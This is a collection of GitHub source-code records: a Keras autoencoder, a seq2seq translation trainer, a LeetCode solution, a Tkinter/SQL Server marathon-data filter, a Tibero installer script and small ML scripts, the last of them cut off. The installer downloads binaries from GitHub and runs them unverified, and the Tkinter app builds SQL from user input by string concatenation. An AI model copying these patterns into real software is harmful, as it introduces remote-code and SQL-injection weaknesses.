activation='relu', border_mode='same')(x)\n x = MaxPooling2D((2, 2), border_mode='same')(x)\n \n encoded = Convolution2D(8*dim_factor, (3, 3), activation='relu', border_mode='same')(x)\n \n #encoded = MaxPooling2D((3, 3), border_mode='valid')(x)\n \n return encoded\n\ndef decoded(encoded,dim_factor):\n #x = Dense(512, activation='relu')(encoded)\n #x = Dense(1024, activation='relu')(x)\n #decoded = Dense(3072, activation='sigmoid')(x)\n \n x = Convolution2D(8*dim_factor, (3, 3), activation='relu', border_mode='same')(encoded)\n x = UpSampling2D((2, 2))(x)\n x = Convolution2D(3, (3, 3), activation='relu', border_mode='same')(x)\n x = UpSampling2D((2, 2))(x)\n #x = Convolution2D(3, 3, 3, activation='relu')(x)\n #x = UpSampling2D((2, 2))(x)\n decoded = Convolution2D(3, 3, 3, activation='sigmoid', border_mode='same')(x)\n \n return decoded\n\ndim_factor=6*2*2\nencoding_dim = 32*dim_factor\ninput_img = Input(shape=(32,32,3))\n#input_img = Input(shape=(3072,))\nencoded = encoded(input_img, dim_factor)\ndecoded = decoded(encoded, dim_factor)\nautoencoder = Model(input=input_img, output=decoded)\n\nautoencoder.compile(optimizer='adam', loss='binary_crossentropy')\n#autoencoder.load_weights('autoencoder.h5')\nautoencoder.summary()\n\n(x_train,y_train), (x_test,y_test) = cifar10.load_data() #mnist.load_data() #cifar10.load_data()\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\n#x_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n#x_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\nx_train = x_train[:50000]\nx_test = x_test[:10000]\n\nfor j in range(10):\n autoencoder.fit(x_train, x_train,\n nb_epoch=50,\n batch_size=256,\n shuffle=True,\n validation_data=(x_test, x_test))\n\n autoencoder.save_weights('autoencoder_D'+str(dim_factor)+'{0:03d}.h5'.format(j))\n autoencoder.load_weights('autoencoder_D'+str(dim_factor)+'{0:03d}.h5'.format(j))\n\n# テスト画像を変換\n decoded_imgs = autoencoder.predict(x_test)\n\n n = 10\n#encoded_imgs=[]\n encoder = Model(input_img, encoded)\n encoded_imgs = encoder.predict(x_test[:n])\n\n plt.figure(figsize=(32, 12))\n for i in range(n):\n # オリジナルのテスト画像を表示\n ax = plt.subplot(3, n, i+1)\n plt.imshow(x_test[i].reshape(32,32,3))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax = plt.subplot(3, n, i+1+2*n)\n plt.imshow(decoded_imgs[i].reshape(32, 32,3))\n ax = plt.subplot(3, n, i+1+n)\n plt.imshow(encoded_imgs[i].reshape(32*2,32*2,3))\n plt.axis('off')\n plt.savefig(\"./caps_figures/autoencoder\"+str(dim_factor)+\"{0:03d}.png\".format(j))\n \n\n plt.pause(3)\n plt.close()\n\n\"\"\"\n_________________________________________________________________\nLayer (type) Output Shape Param #\n=================================================================\ninput_1 (InputLayer) (None, 3072) 0\n_________________________________________________________________\ndense_1 (Dense) (None, 1024) 3146752\n_________________________________________________________________\ndense_2 (Dense) (None, 512) 524800\n_________________________________________________________________\ndense_3 (Dense) (None, 320) 164160\n_________________________________________________________________\ndense_4 (Dense) (None, 512) 164352\n_________________________________________________________________\ndense_5 (Dense) (None, 1024) 525312\n_________________________________________________________________\ndense_6 (Dense) (None, 3072) 3148800\n=================================================================\nTotal params: 7,674,176\nTrainable params: 7,674,176\nNon-trainable params: 0\n_________________________________________________________________\n\"\"\"","repo_name":"MuAuan/AutoEncoder","sub_path":"AutoEncoder.py","file_name":"AutoEncoder.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2071088873","text":"#TLE at 56/57 test cases\nclass Solution(object):\n def minTotalDistance(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid or not grid[0]: \n return None\n m, n = len(grid), len(grid[0])\n \n def bfs(i,j):\n q = collections.deque([(i,j, 0)])\n while q: \n i, j, d = q.popleft()\n dist[i][j] += d\n for x, y in [(i+1,j), (i-1,j), (i,j+1), (i,j-1)]:\n if 0<=x\"\n for i in np_tens:\n cur_snt = transform_seq_to_sent(i, vcb)\n snts.append(cur_snt[:cur_snt.index(\"\") if end_snt in cur_snt else len(cur_snt)].split())\n return snts\n\ndef bleu_score(unscaled_logits, outputs, rev_chunk_batch_torch, vcb_id2word):\n hypothesis = transform_tensor_to_list_of_snts(outputs, vcb_id2word)\n reference = transform_tensor_to_list_of_snts(rev_chunk_batch_torch, vcb_id2word)\n reference = [[cur_ref] for cur_ref in reference]\n list_of_hypotheses = hypothesis\n list_of_references = reference\n return nltk.translate.bleu_score.corpus_bleu(list_of_references, list_of_hypotheses)\n# %%\n# src, tgt = bg.next()\n# bg.vocab.tgt.id2word[2]\n# tgt[0]\n#\n# # %%\n# enc = Encoder(len(bg.vocab.src), 4, 5)\n# dec = Decoder(len(bg.vocab.tgt), enc.embedding, 4, 5)\n# a, b = bg.next()\n# a.data.shape\n# b.data.shape\n# all_hidden, all_cell = enc(a)\n# dec(all_hidden, all_cell, b, enc.batch_size)\n# %%\n\ntrain_batch_size = 128 # that was 200\neval_batch_size = 64\ntest_batch_size = 64\ndecode_batch_size = 8\n\nvocab_path=\"data/nmt_iwslt/vocab.bin\"\nbg = BatchGenerator(vocab_path=vocab_path, train_batch_size=train_batch_size, eval_batch_size=eval_batch_size, test_batch_size=test_batch_size)\ntask = 'translation'\n\nchunk_length = 32\n\ntrain_losses_av_mean = {}\ntrain_accs_av_mean = {}\n\ntrain_losses_pav_av_mean = {}\ntrain_accs_pav_av_mean = {}\n\n#eval_losses_av_mean = {}\n#eval_accs_av_mean = {}\n\ntrain_losses_pav_av_std = {}\ntrain_accs_pav_av_std = {}\n\ntrain_losses_av_std = {}\ntrain_accs_av_std = {}\n\nuse_masked_loss = True\nif use_masked_loss:\n loss_function = masked_cross_entropy\nelse:\n loss_function = nn.CrossEntropyLoss()\n\nvocab_size_encoder = len(bg.vocab.src)\nvocab_size_decoder = len(bg.vocab.tgt)\n\nnum_runs = 1\n\n#num_steps = 60000\n#print_skip = 50\n#save_per_step = 10000\nnum_steps = 5000\nprint_skip = 100\nsave_per_step = 1000\n\ntrain_losses = []\ntrain_accs = []\n\neval_losses = []\neval_accs = []\n\nNOT_AVAILABLE = 'NA'\n\nfeed_mode = 'gumbel-st'\ntf_ratio_range = (0.0, 0.0)\nfeed_baseline = 'argmax'\nif feed_mode != 'sampling':\n feed_baseline = NOT_AVAILABLE\nsoftmax_t_range = (1.0, 0.01)\nif feed_mode in ['argmax', 'sampling']:\n softmax_t_range = NOT_AVAILABLE\nbaseline_feed_mode = None\nif feed_baseline == 'argmax':\n baseline_feed_mode = 'argmax'\nattention_mode = 'hard'\nattention_baseline = 'argmax'\nif attention_mode != 'hard':\n attention_baseline = NOT_AVAILABLE\nbaseline_attention_mode = None\nif attention_baseline == 'argmax':\n baseline_attention_mode = 'argmax'\n\nmode_name = 'feed=' + feed_mode + '__tf_ratio=' + str(tf_ratio_range) + '__softmax_t=' + str(softmax_t_range) + '__feed_baseline=' + feed_baseline + '__attn=' + attention_mode + '__attn_baseline=' + attention_baseline\n\ndo_eval = True\ndo_print = False\n\nav_advantage = None\nstd_advantage = None\n\ngrad_norms = None\n\n#train_batch_gen, eval_batch_gen = get_data_generators(\n# train_batch_size, chunk_length, eval_batch_size\n#)\n\nwith open('data/fasttext/my_de_emb', 'rb') as f:\n de_emb = pickle.load(f)\n\nwith open('data/fasttext/my_en_emb', 'rb') as f:\n en_emb = pickle.load(f)\n\nmodel_params = {\n 'vocab_size_encoder': vocab_size_encoder,\n 'vocab_size_decoder': vocab_size_decoder,\n 'enc_pre_emb': de_emb,\n 'dec_pre_emb': en_emb,\n 'embed_dim': 128,\n 'hidden_size': 256\n}\n\nimport os\nimport pickle\n\nsave_path = './saved_models/' + mode_name\nif not os.path.exists(save_path):\n os.makedirs(save_path)\nwrite_path = './output/' + mode_name\nif not os.path.exists(write_path):\n os.makedirs(write_path)\n\n# %% TRAINING\nprint(mode_name)\nfor run in range(num_runs):\n print('Run', run)\n print()\n train_losses.append([])\n train_accs.append([])\n cum_train_loss = 0\n cum_train_acc = 0\n\n train_av_loss = 0\n batch_av_train_av_loss = 0\n\n eval_losses.append([])\n eval_accs.append([])\n cum_eval_loss = 0\n cum_eval_acc = 0\n cum_eval_bleu = 0\n\n global_start_time = time()\n last_print_time = global_start_time\n model = CUDA_wrapper(\n Seq2SeqModel(\n **model_params,\n feed_mode=feed_mode, \n baseline_feed_mode=baseline_feed_mode,\n attention_mode=attention_mode, \n baseline_attention_mode = baseline_attention_mode\n )\n )\n\n av_advantage = []\n std_advantage = []\n\n grad_norms = []\n grad_norms_biased = []\n\n init_lr = 0.001\n lr = init_lr\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr)\n\n for step in range(num_steps):\n if softmax_t_range != NOT_AVAILABLE:\n softmax_t = softmax_t_range[0] * (softmax_t_range[1] / softmax_t_range[0]) ** (step / num_steps)\n else:\n softmax_t = 0.0\n tf_ratio = tf_ratio_range[0] + (tf_ratio_range[1] - tf_ratio_range[0]) * (step / num_steps)\n\n chunk_batch_torch, tgt_batch_torch, tgt_len = bg.next_train()\n #print(chunk_batch_torch.size())\n #print(tgt_batch_torch.size())\n true_train_batch_size, true_chunk_length = chunk_batch_torch.size()\n true_train_batch_size, true_tgt_length = tgt_batch_torch.size()\n\n (unscaled_logits, outputs), \\\n (unscaled_logits_feed_baseline, outputs_feed_baseline), \\\n (unscaled_logits_attn_baseline, outputs_attn_baseline) = model(\n chunk_batch_torch, tgt_batch_torch,\n softmax_temperature=softmax_t,\n teacher_forcing_ratio=tf_ratio\n )\n \n if use_masked_loss:\n # unscaled_logits.data.shape\n # rev_chunk_batch.data.shape\n # print('Check (batch, max_len, num_classes) :', unscaled_logits.data.shape)\n # print('Check2 (batch, max_len): ', tgt_batch.data.shape)\n train_loss = loss_function(unscaled_logits, tgt_batch_torch, tgt_len)\n else:\n train_loss = loss_function(unscaled_logits.view(-1, vocab_size_decoder), tgt_batch_torch.view(-1))\n \n train_acc = torch.mean(torch.eq(outputs, tgt_batch_torch).float())\n \n if feed_baseline != NOT_AVAILABLE:\n if feed_baseline == 'no-reinforce':\n for dec_feed in model.decoder.dec_feeds:\n dec_feed.reinforce(\n CUDA_wrapper(torch.zeros(true_train_batch_size, 1))\n )\n elif feed_baseline == 'argmax':\n tgt_batch_torch_one_hot = CUDA_wrapper(\n torch.zeros(\n true_train_batch_size, true_tgt_length, vocab_size_decoder\n )\n )\n tgt_batch_torch_one_hot.scatter_(\n 2, tgt_batch_torch.data.view(true_train_batch_size, true_tgt_length, 1), 1\n )\n elemwise_train_loss = (-1) * F.log_softmax(\n unscaled_logits.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n elemwise_train_loss_feed_baseline = (-1) * F.log_softmax(\n unscaled_logits_feed_baseline.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n normed_elemwise_advantage = (\n (elemwise_train_loss_feed_baseline - elemwise_train_loss) /\n (true_train_batch_size * true_tgt_length)\n )\n sum_normed_elemwise_advantage = torch.sum(\n normed_elemwise_advantage, dim=1\n )\n cumsum_normed_elemwise_advantage = torch.cumsum(\n normed_elemwise_advantage, dim=1\n )\n for t, dec_feed in enumerate(model.decoder.dec_feeds):\n dec_feed.reinforce(\n (sum_normed_elemwise_advantage - cumsum_normed_elemwise_advantage[:, t]).view(true_train_batch_size, 1)\n )\n\n av_advantage.append(torch.mean(elemwise_train_loss_feed_baseline - elemwise_train_loss, dim=0).cpu().numpy())\n std_advantage.append(torch.std(elemwise_train_loss_feed_baseline - elemwise_train_loss, dim=0).cpu().numpy())\n else:\n raise ValueError('Unknown feed_baseline: {}'.format(feed_baseline))\n\n if attention_baseline != NOT_AVAILABLE:\n if attention_baseline == 'argmax':\n tgt_batch_torch_one_hot = CUDA_wrapper(\n torch.zeros(\n true_train_batch_size, true_tgt_length, vocab_size_decoder\n )\n )\n tgt_batch_torch_one_hot.scatter_(\n 2, tgt_batch_torch.data.view(true_train_batch_size, true_tgt_length, 1), 1\n )\n elemwise_train_loss = (-1) * F.log_softmax(\n unscaled_logits.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n elemwise_train_loss_attn_baseline = (-1) * F.log_softmax(\n unscaled_logits_attn_baseline.data.view(-1, vocab_size_decoder)\n ).data.view(true_train_batch_size, true_tgt_length, vocab_size_decoder)[tgt_batch_torch_one_hot.byte()].view(\n true_train_batch_size, true_tgt_length\n )\n normed_elemwise_advantage = (\n (elemwise_train_loss_attn_baseline - elemwise_train_loss) /\n (true_train_batch_size * true_tgt_length)\n )\n sum_normed_elemwise_advantage = torch.sum(\n normed_elemwise_advantage, dim=1\n )\n cumsum_normed_elemwise_advantage = torch.cumsum(\n normed_elemwise_advantage, dim=1\n )\n for t, attn_idx in enumerate(model.decoder.attention_idx):\n attn_idx.reinforce(\n (sum_normed_elemwise_advantage - cumsum_normed_elemwise_advantage[:, t]).view(true_train_batch_size, 1)\n )\n\n else:\n raise ValueError('Unknown attention_baseline: {}'.format(attention_baseline))\n\n optimizer.zero_grad()\n train_loss.backward()\n nn.utils.clip_grad_norm(model.parameters(), max_norm=4)\n optimizer.step()\n train_losses[-1].append(train_loss.data.cpu().numpy().mean())\n train_accs[-1].append(train_acc.data.cpu().numpy().mean())\n\n cum_train_loss += train_losses[-1][-1]\n cum_train_acc += train_accs[-1][-1]\n if do_eval:\n chunk_batch_torch, tgt_batch_torch, tgt_len = bg.next_eval()\n\n (unscaled_logits, outputs), \\\n (unscaled_logits_feed_baseline, outputs_feed_baseline), \\\n (unscaled_logits_attn_baseline, outputs_attn_baseline) = model(\n chunk_batch_torch, tgt_batch_torch,\n work_mode='test'\n )\n if use_masked_loss:\n eval_loss = loss_function(unscaled_logits, tgt_batch_torch, tgt_len)\n else:\n eval_loss = loss_function(\n unscaled_logits.view(-1, vocab_size_decoder),\n tgt_batch_torch.view(-1)\n )\n eval_acc = torch.mean(torch.eq(outputs[:, :tgt_batch_torch.size(1)].contiguous(), tgt_batch_torch).float())\n\n eval_losses[-1].append(eval_loss.data.cpu().numpy().mean())\n eval_accs[-1].append(eval_acc.data.cpu().numpy().mean())\n\n cum_eval_loss += eval_losses[-1][-1]\n cum_eval_bleu += bleu_score(\n unscaled_logits, outputs, tgt_batch_torch, bg.vocab.tgt.id2word\n )\n cum_eval_acc += eval_accs[-1][-1]\n\n # Print:\n if (step + 1) % print_skip == 0:\n print('Step', step + 1)\n\n print('softmax temperature: {:.2f}'.format(softmax_t))\n print('teacher-forcing ratio: {:.2f}'.format(tf_ratio))\n\n print('Train loss: {:.2f}; train accuracy: {:.2f}'.format(\n cum_train_loss / print_skip, cum_train_acc / print_skip\n ))\n cum_train_loss = 0\n cum_train_acc = 0\n\n if do_eval:\n if task=='translation':\n print('Eval loss: {:.2f}; eval accuracy: {:.2f}; eval bleu: {:.2f}'.format(\n cum_eval_loss / print_skip, cum_eval_acc / print_skip, cum_eval_bleu / print_skip\n ))\n cum_eval_loss = 0\n cum_eval_acc = 0\n cum_eval_bleu = 0\n\n if do_print:\n outputs_np = outputs.data.cpu().numpy()\n cur_decode_batch_size = min(\n decode_batch_size,\n min(len(tgt_batch_torch), len(outputs_np))\n )\n for i in range(cur_decode_batch_size):\n print('{}\\n| vs |\\n{}'.format(\n ' '.join([bg.vocab.tgt.id2word[k.data[0]] for k in tgt_batch_torch[i]]),\n ' '.join([bg.vocab.tgt.id2word[k] for k in outputs_np[i]])\n ))\n\n else:\n raise ValueError('Unknown task: {}'.format(task))\n\n print('{:.2f}s from last print'.format(time() - last_print_time))\n last_print_time = time()\n print()\n if (step + 1) % save_per_step == 0:\n print('perform saving the model:')\n torch.save(model.state_dict(), save_path + \"/step=\" + str(step))\n print('model saved')\n\n eval_losses_mean = np.mean(eval_losses, axis=0)\n eval_losses_std = np.std(eval_losses, axis=0)\n\n eval_accs_mean = np.mean(eval_accs, axis=0)\n eval_accs_std = np.std(eval_accs, axis=0)\n\n train_losses_mean = np.mean(train_losses, axis=0)\n train_losses_std = np.std(train_losses, axis=0)\n\n train_accs_mean = np.mean(train_accs, axis=0)\n train_accs_std = np.std(train_accs, axis=0)\n\n for name in ['train_losses', 'train_accs', 'eval_losses', 'eval_accs']:\n for suffix in ['', '_mean', '_std']:\n with open(write_path + '/' + name + suffix + '.dat', 'wb') as f:\n pickle.dump(eval(name + suffix), f)\n print('output written')\n","repo_name":"varenick/seq2seq","sub_path":"notebook.py","file_name":"notebook.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86372688150","text":"import pyodbc\nimport pandas as pd\nimport tkinter as tk\n\nfrom tkinter import *\nfrom tkinter import ttk #Importamos todas las funciones que contiene tkinter\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\n\n# Se importa primeramente la tabla a trabajar para pasarla a SQL\n\ncarreras=pd.read_csv('C:/Users/Manuel Gastelum/Clase 13/Tarea 14/Maraton NY completo.csv', \n engine='python') \ncarreras= carreras.fillna(value=0)\nLista_valores = carreras.values.tolist()\n\nfor inner_list in Lista_valores:\n\tinner_list[5] = round(inner_list[5],2)\n\n#print(Lista_valores)\ntuplas_lista = tuple(Lista_valores) \n#print(tuplas_lista)\n\nserver = 'VINDMGASTELUMTE\\MSSQLSERVER01'\nconexion = pyodbc.connect('DRIVER={SQL Server};SERVER='+server, autocommit=True)\n\n\ncursor = conexion.cursor()\ncursor.execute(\"IF NOT EXISTS(SELECT * FROM sys.databases WHERE name = 'Nueva') BEGIN CREATE DATABASE Nueva END\")\ncursor.execute(\"DROP DATABASE Nueva\") \ncursor.execute(\"CREATE DATABASE Nueva\") \nconexion.close()\n\n\nconexion = pyodbc.connect(driver='{SQL server}', host = server, database = \"Nueva\")\ncursor = conexion.cursor()\ncursor.execute(\"CREATE TABLE MaratonNY_Python (Corredor INT, place INT, gender VARCHAR(25), age INT, home VARCHAR(10), time FLOAT)\")\ncursor.executemany(\"INSERT INTO MaratonNY_Python VALUES(?,?,?,?,?,?)\", tuplas_lista)\ncursor.commit()\nconexion.close()\n\nclass General:\n\tdef __init__(self, raiz):\n\t\tself.genero = StringVar()\n\t\tself.label_genero = Label(raiz, text = \"Género\")\n\t\tself.label_genero.grid(column=0, row=0)\n\t\tself.genero = Combobox(raiz, values=('Female', 'Male'), width=5)\n\t\tself.genero.grid(column=0, row=1)\n\n\t\tself.origen = StringVar()\n\t\tself.label_origen = Label(raiz, text = \"Origen\")\n\t\tself.label_origen.grid(column=0, row=5)\n\t\tself.origen = Combobox(raiz, values=(\"GBR\", \"NY\", \"FRA\", \"MI\", \"IRL\", \"GER\", \"Otro\"), width=10)\n\t\tself.origen.grid(column=0,row=6)\n \n\t\tself.time = StringVar()\n\t\tself.label_time = Label(raiz, text = \"Tiempo\")\n\t\tself.label_time.grid(column=0, row=10)\n\t\tself.time = Combobox(raiz, values=(\"menos de 200 min\", \"entre 200 y 250 min\", \"entre 250 y 300 min\", \"más de 300 min\", \"NULL\"), width=10)\n\t\tself.time.grid(column=0,row=11)\n\n\t\t#Creamos los botones\n\t\t#Con command le decimos cual función queremos que lleve a cabo\n\t\tself.boton_buscar= Button(raiz, text=\"Buscar\", command=self.buscar)\n\t\tself.boton_buscar.grid(column=0, row=30)\n\n\t\tself.boton_borrar=Button(raiz, text=\"Borrar\", command=self.borrar)\n\t\tself.boton_borrar.grid(column=0, row=40)\n\n\t\t#Tabla\n\t\tself.tabla=ttk.Treeview(raiz, column=(\"c1\", \"c2\", \"c3\", \"c4\"), show='headings', height=8)\n\t\tself.tabla.column(\"# 1\",anchor=CENTER, stretch=NO, width=100)\n\t\tself.tabla.heading(\"# 1\", text=\"Corredor\")\n\t\tself.tabla.column(\"# 2\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 2\", text=\"Género\")\n\t\tself.tabla.column(\"# 3\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 3\", text=\"Origen\")\n\t\tself.tabla.column(\"# 4\", anchor=CENTER, stretch=NO)\n\t\tself.tabla.heading(\"# 4\", text=\"Tiempo\") \n\t\tself.tabla.grid(column=0, row=50)\n \n\tdef buscar(self):\n\t\tself.tabla.delete(*self.tabla.get_children())\n\t\tserver = 'VINDMGASTELUMTE\\MSSQLSERVER01'\n\t\tbd = 'Nueva'\n\t\tgenero_valor = \"'\" + self.genero.get() + \"'\"\n\t\t#print(genero_valor)\n\n\t\torigen = \"'\" + self.origen.get() + \"'\"\n\t\ttime = \"'%\" + self.time.get().lower() + \"%'\"\n\n\t\tconexion = pyodbc.connect(driver='{SQL server}', host = server, database = bd)\n\t\t\n\n\t\t#Creamos un cursor para almacenar la información en memoria\n\t\tcursor = conexion.cursor()\n\t\tif self.origen.get()=='Otro':\n\t\t\tinstruccion = \"SELECT Corredor, gender, home, time FROM MaratonNY_Python WHERE gender= \" + genero_valor + \" AND home <> 'GBR' AND home <> 'NY' AND home <> 'FRA' AND home <> 'MI' AND home <> 'IRL' AND home <> 'GER'\"\n\t\telse:\n\t\t\tinstruccion = \"SELECT Corredor, gender, home, time FROM MaratonNY_Python WHERE gender= \" + genero_valor + \" AND home = \" + origen\n\t\tif self.time.get() == \"menos de 200 min\":\n\t\t\tinstruccion = instruccion + \" AND time < 200\"\n\t\telif self.time.get() == \"entre 200 y 250 min\":\n\t\t\tinstruccion = instruccion + \" AND time < 250 AND time > 200\"\n\t\telif self.time.get() == \"entre 250 y 300 min\":\n\t\t\tinstruccion = instruccion + \" AND time < 300 AND time > 250\"\n\t\telif self.time.get() == \"más de 300 min\":\n\t\t\tinstruccion = instruccion + \" AND time > 300\"\n\t\tcursor.execute(instruccion)\n\t\tdatos_clientes = cursor.fetchall()\n\t\tprint(datos_clientes)\n\t\tconexion.commit()\n\n\n\t\t#Nos aseguramos de cerrar la conexión\n\t\tconexion.close()\n \n\t\t#Mandamos la información a la tabla\n\t\tfor row in datos_clientes:\n\t\t\tself.tabla.insert('', 'end', values=((row[0],row[1],row[2],row[3])))\n\t\t#messagebox.showinfo(\"Resultados\", datos_clientes)\n\n\t#def desplegar_resultados(self):\n\n\tdef borrar(self):\n\t\tself.tabla.delete(*self.tabla.get_children())\n\t\tself.genero.set(\"\")\n\t\tself.origen.set(\"\")\n\n\n\n\n\n#Creamos el objeto que será la raiz de la aplicación\nraiz = Tk()\n#Le agregamos un título\nraiz.title(\"Filtrador de tabla de corredores\")\n#Determinamos si se podrá cambiar su tamaño\nraiz.resizable(1,1)\n#Asignamos un logotipo\nraiz.iconbitmap('objetos.ico')\n#Asignamos un tipo de cursor, un color de background y un borde a la raiz\nraiz.config(bd=8)\nraiz.config(relief=\"ridge\")\nestructura = General(raiz)\n\nraiz.mainloop()","repo_name":"m5991/Tarea-14---Programacion-1","sub_path":"Tarea Clase 14 - MGR.py","file_name":"Tarea Clase 14 - MGR.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11220822530","text":"#!/usr/bin/env python2\n\nimport urllib\nimport os\nimport logging\n\nlogging.basicConfig(filename='/dev/stdout', level=logging.DEBUG, format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\n\ndef logger_info(message):\n logging.info('\\033[1;32m' + message + '\\033[0m')\n\nurl = \"https://github.com/miglesiassarria/tibero/raw/master/installation/Tib6.bin.00\"\nruta_base = \"tibero\"\ndestino = ruta_base + \"/Tib6.bin.00\"\nexiste = ruta_base + \"/tibero6\"\ninstalador = ruta_base + \"/installer.bin\"\ntbhome = os.environ.get(\"TB_HOME\")\n\n\nif os.path.exists(existe):\n logger_info(\"TIBERO YA SE ENCUENTRA INSTALADO\")\n bd_list = os.listdir(tbhome)\n\n for name in bd_list:\n if name[(len(name)-5):len(name)] == \".conf\":\n database_id = name[0:len(name)-5]\n os.environ[\"TB_SID\"] = database_id\n os.system(\"tbdown clean\")\n os.system(\"tbboot\")\n\n\nelse:\n logger_info(\"INSTALANDO TIBERO\")\n for i in range(5):\n urllib.urlretrieve(url + str(i+1), filename=destino + str(i+1))\n\n os.system(\"cat \" + destino + \"* > \" + ruta_base + \"/installer.bin\")\n os.system(\"chmod +x \" + ruta_base + \"/installer.bin\")\n os.system(instalador + \" -f /solutions/installvariables.properties -i silent\")\n os.system(\"chmod +x /tibero/tibero6/client/bin/install.sh\")\n os.system(\"mkdir \" + ruta_base + \"/scripts\")\n os.system(\"mkdir \" + ruta_base + \"/dbrepo\")\n os.system(\"touch \" + ruta_base + \"/dbrepo/dbs.ini\")\n\n logger_info(\"Preparando scripts de base de datos\")\n os.system(\"cp /solutions/scripts/*.sh /tibero/\")\n os.system(\"cp /solutions/scripts/*.py /tibero/scripts\")\n os.system(\"rm \" + ruta_base + \"/*bin*\")\n\n logger_info(\"INSTALACION FINALIZADA !!!DISFRUTALA!!|!\")\n\n\nos.system(\"/bin/bash\")","repo_name":"nfqSolutionsDocker/tibero","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4091878682","text":"import cv2\nimport matplotlib.pyplot as plt\nfrom keras.models import load_model\nimport numpy as np\n\ncv2.namedWindow(\"Press space to capture\")\nvc = cv2.VideoCapture(0)\n\nif vc.isOpened(): # try to get the first frame\n rval, frame = vc.read()\nelse:\n rval = False\n\n# print(grayscale_image[0][0][:])\n\nwhile rval:\n cv2.imshow(\"Press space to capture\", frame)\n rval, frame = vc.read()\n key = cv2.waitKey(20)\n if key == 32: # exit on ESC\n break\n\nvc.release()\ncv2.destroyWindow(\"Press space to capture\")\n\ngrayscale_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY).reshape(480, 640)\n\nfor i in range(len(grayscale_image)):\n for j in range(len(grayscale_image[0])):\n grayscale_image[i][j] = 255 - grayscale_image[i][j]\n\nresized_gray_image = cv2.resize(grayscale_image, (28, 28), cv2.INTER_LINEAR)\n\nplt.imshow(resized_gray_image)\nplt.show()\n\nresized_gray_image = resized_gray_image.reshape(1, 28, 28, 1)\n\nld_model = load_model('data/cnn.keras')\nprediction = ld_model.predict(resized_gray_image)\n\nprint(prediction)\nprint(np.argmax(prediction))\n","repo_name":"jmotamarry/Machine-Learning","sub_path":"camera_model_integration.py","file_name":"camera_model_integration.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73613591847","text":"import torch\nimport numpy as np\nimport pandas as pd\nfrom math import sqrt\nimport torch.optim as optim\nimport torch.nn as nn\nfrom sklearn.metrics import (mean_squared_error,\n confusion_matrix,\n classification_report,\n f1_score,\n precision_score,\n recall_score)\n\nfrom imblearn.over_sampling import SMOTE\n\nfrom datasets.occur.split_train_test import fog_data_train_test_split\nfrom datasets.occur.util import (convert_torch_type,\n binary_acc)\n\nfrom model.occdnn import Deep_Neural_Network_Target_Existence\n\n\n\ndef change_batch_size(vis_limit_num, all_parameters_list, i):\n if vis_limit_num == 1000:\n batch_size = 128\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n print('batch_size : ', batch_size)\n return all_parameters_list\n\n elif vis_limit_num == 100:\n batch_size = 16\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n return all_parameters_list\n\n elif vis_limit_num == 500:\n batch_size = 30\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n return all_parameters_list\n\n elif vis_limit_num == 5000:\n batch_size = 256\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n print('batch_size : ', batch_size)\n return all_parameters_list\n\n elif vis_limit_num == 10000:\n batch_size = 512\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n print('batch_size : ', batch_size)\n return all_parameters_list\n\n elif vis_limit_num == 30000:\n batch_size = 768\n temp_list = list(all_parameters_list[i])\n temp_list[4] = batch_size\n all_parameters_list[i] = tuple(temp_list)\n print('batch_size : ', batch_size)\n return all_parameters_list\n\n\n\ndef return_precision_recall_f1(true_value, predict_value, pos_label = 1):\n precision = precision_score(true_value.squeeze(), predict_value.squeeze(), pos_label=pos_label)\n recall = recall_score(true_value.squeeze(), predict_value.squeeze(), pos_label=pos_label)\n f1_score_value = f1_score(true_value.squeeze(), predict_value.squeeze(), pos_label = pos_label)\n rmse = sqrt(mean_squared_error(true_value.squeeze(), predict_value.squeeze()))\n return precision, recall, f1_score_value, rmse\n\n\n\n\ndef run_model(data_path, save_path, pre_data_list, obs_point, vis_limit_list, all_parameters_list):\n for vis_limit_num in vis_limit_list:\n obs_save_path = save_path + str(obs_point) + \"\\\\\" + str(vis_limit_num)\n\n train_x, test_x, train_y, test_y = fog_data_train_test_split(data_path, save_path, obs_point, pre_data_list,\n 